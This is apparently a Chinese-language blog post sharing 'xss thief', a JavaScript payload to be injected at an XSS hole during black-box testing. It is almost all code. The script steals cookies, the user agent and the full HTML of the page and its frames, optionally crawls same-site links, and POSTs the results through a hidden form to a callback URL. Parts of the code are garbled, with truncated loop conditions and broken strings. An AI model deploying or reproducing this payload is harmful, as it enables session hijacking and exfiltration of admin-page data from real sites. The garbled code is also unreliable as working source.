在黑盒测试的时候,可以偷取后台页面与页面上所有链接页面的HTML源码,
xss thief
。。在XSS的地方直接引入这个JS就可以了。。
// xss thief .. codz by n1nty.
// tested on ie8 firefox 3.6
//test.asp?c=xxxxx
var xssCallbackUrl = “http://www.xxxx.com/test.asp”;
var xssHost = window.location.hostname;
var xssIndex = 0;
var xssParseLink = false; //是否对页面里面的link进行ajax解析
var xssHandledUrl = new Array();
var xssLinkLimit = 0; //最多解析多少个link,0为不限制
var xssLinkHtml = “”;
var xssLinkDoneCount = 0;
var xssPerPostLinkNum = 5; //解析几个link后发一次POST
xssHandledUrl.contains = function(v) {
for (var i = 0;i if (this[i] == v) { return true; } } return false; } function xssParseHtml(win) { if (win.document && win.document.documentElement) { var html = win.document.documentElement.innerHTML; return “Html Source :\r\n” + html; } } function xssDoParseLink(win) { var links = win.document.links; var max = (xssLinkLimit == 0) ? links.length : xssLinkLimit; for (var i = 0;i if (links[i].href.indexOf(“http://”+xssHost) == 0 && !links[i].onclick) { doAjax(links[i].href,links.length); } else { xssLinkDoneCount ++; } } } function doAjax(url,total) { var tu = url.toLowerCase(); if (tu.indexOf(“logout”) != -1 || tu.indexOf(“delete”) != -1 || tu.indexOf(“del”) != -1 || tu.indexOf(“remove”) != -1) { xssLinkDoneCount ++; return; } var http = null; var u = url; var start = u.lastIndexOf(“/”); if (u.indexOf(“?”) != -1) { var last = u.indexOf(“?”); u = u.substring(start,last); } else { u = u.substring(start); } if (xssHandledUrl.contains(u)) { xssLinkDoneCount ++; return; } xssHandledUrl.push(u); if (window.XMLHttpRequest) { http = new window.XMLHttpRequest(); } else { http = new ActiveXObject(“microsoft.xmlhttp”); } http.onreadystatechange = function () { if (http.readyState == 4 && http.status == 200) { xssLinkDoneCount ++; xssLinkHtml += “\”"+ url + “\” html source : \r\n”; xssLinkHtml += http.responseText+”\r\n”; if (xssLinkDoneCount % xssPerPostLinkNum == 0) { var tmpHtml = xssLinkHtml; xssLinkHtml = “”; xssDoPost(tmpHtml); } else if (xssLinkDoneCount == total) { xssDoPost(xssLinkHtml); } } } http.open(“GET”,url,true); http.send(); } function xssDoPost(data) { var postFrame. = null; if (window.navigator.userAgent.toLowerCase().indexOf(“msie”) != -1) { postFrame. = document.createElement(“ } else { postFrame. = document.createElement(“iframe”); postFrame.id = “xssFrame”+xssIndex; postFrame.style.display = “none”; postFrame.name = “xssFrame”+xssIndex; } document.body.appendChild(postFrame); var postForm. = document.createElement(“form”); postForm.style.display = “none”; postForm.action = xssCallbackUrl; postForm.method = “POST”; postForm.target = “xssFrame”+xssIndex; xssIndex ++; var c = document.createElement(“textarea”); c.name = “c”; if (window.navigator.userAgent.toLowerCase().indexOf(“msie 6″)!=-1) { c.value = escape(data); } else { c.value = data.replace(/&/g,”&”).replace(//g,”>”); } postForm.appendChild(c); document.body.appendChild(postForm); postForm.submit(); } window.onload = function() { try { var wins = new Array(); var str = “——————————————————————————————————-\r\n”; str += “userAgent : “+window.navigator.userAgent + “\r\n”; str += “time : “+new Date() +”\r\n”; str += “Cookie : “+document.cookie +”\r\n”; if (top != window) { str += (top.name?top.name:” var frms = top.frames; for (var i = 0;i str += frms[i].name + “=” + frms[i].location.href+”\r\n”; str += xssParseHtml(frms[i])+”\r\n”; wins.push(frms[i]); } } else { str += (window.name?window.name:” str += xssParseHtml(window) +”\r\n”; wins.push(window); } str += “———————————————————————————————————-\r\n”; xssDoPost(str); if (xssParseLink) { for (var i =0;i xssDoParseLink(wins[i]); } } } catch (e){ } }